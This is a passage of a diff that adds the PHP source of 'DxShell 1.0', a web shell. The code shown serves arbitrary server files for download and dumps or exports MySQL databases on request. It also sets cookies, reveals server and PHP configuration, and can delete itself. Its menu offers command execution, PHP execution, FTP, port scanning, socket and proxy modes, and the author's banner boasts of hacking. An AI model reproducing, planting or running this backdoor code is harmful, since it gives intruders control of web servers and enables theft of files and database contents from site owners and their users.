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',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	Header('Last-Modified: '.gmdate('D, d M Y H:i:s', time()-60*60*24*365).' GMT');   //Date('r'
+	header('Expires: '.gmdate('D, d M Y H:i:s', time()+60*60*24*365).' GMT');
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{
+		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */
+	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{
+		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{
+			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{
+	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{
+		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{
+		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{
+	foreach ($_POST['dxparam'] as $name => $val)
+		{
+		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;
+			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{
+	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}
+		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */
+?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{
+	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{
+	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 1227-700';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ# 1227-700",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"BELLFAGOR",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
